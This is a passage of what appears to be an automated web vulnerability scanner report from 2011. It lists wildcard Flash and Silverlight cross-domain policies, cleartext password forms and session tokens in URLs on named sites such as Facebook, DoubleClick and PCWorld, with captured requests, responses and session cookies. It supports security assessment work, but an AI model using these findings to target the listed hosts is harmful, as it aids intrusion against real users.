The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 34981
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
3.32. http://services.digg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://services.digg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: services.digg.com

Response

HTTP/1.0 200 OK
Connection: Keep-Alive
Etag: "de82c156de1cf394d6473937a6097bac9606d89d"
Content-Type: text/x-cross-domain-policy
Content-Length: 359
Server: TornadoServer/0.1

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.widgetserver.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.widgetbox.com" secure="false" />
...[SNIP]...
3.33. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Thu, 12 May 2011 13:28:56 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
3.34. http://tags.gawker.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.gawker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.gawker.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 12 May 2011 13:28:32 GMT
ETag: "5a10ad-424-4a1fd0c3d89c0"
GawkerApplication: ganja
GawkerApplicationHost: Ganja
GawkerHost: GM68 - Request took D=2339 at t=1305206912838152 on site fetch.gawker.com (live)
Last-Modified: Thu, 28 Apr 2011 16:28:31 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: Apache
X-Cookie-Set: 0
Content-Length: 1060
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gawker.com" />
   <allow-access-from domain="*.gawker.com" />
   <allow-access-from domain="*.gawkerassets.com" />
   <allow-access-from domain="now.sprint.com" />
   <allow-access-from domain="*.chartbeat.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
3.35. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.47.102
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
3.36. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 13:29:34 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...
3.37. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...
3.38. http://www.zdnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...
4. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
4.2. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
4.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Thu, 12 May 2011 14:30:33 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...
5. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://crenk.com/buy-chromebook/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</p>

       <form name="login-form" id="sidebar-login-form" class="standard-form" action="http://crenk.com/wp-login.php" method="post">
           <label>
...[SNIP]...
<br />
           <input type="password" name="pwd" id="sidebar-user-pass" class="input" value="" tabindex="98" /></label>
...[SNIP]...
5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</p>

       <form action="/comments/post/" method="post" class="submit_form default_form submit_comment_form">
           

                                       <p>
...[SNIP]...
</span><input type="password" name="password" id="id_password" /></label>
...[SNIP]...
5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<div class="submit_form_alerts_global">
                           <form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">                    
                               <div class="global_login_container_left">
...[SNIP]...
</label>
                                           
                                           <input id="global_password" class="vPasswordField required" name="password" size="17" value="" maxlength="30" def="" type="password" style="margin-top:12px;"/>
                                           
                                           <span class="global_formtip">
...[SNIP]...
5.4. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...
6. Session token in URL  previous  next
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

6.1. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=f06dc602-68df-478f-8a38-f177716586cf&hostname=mashable.com&location=%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&sessionID=1305206945034.27371&fpc=6f9c964-12fe465750b-2748d999-1&ts1305206987382.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
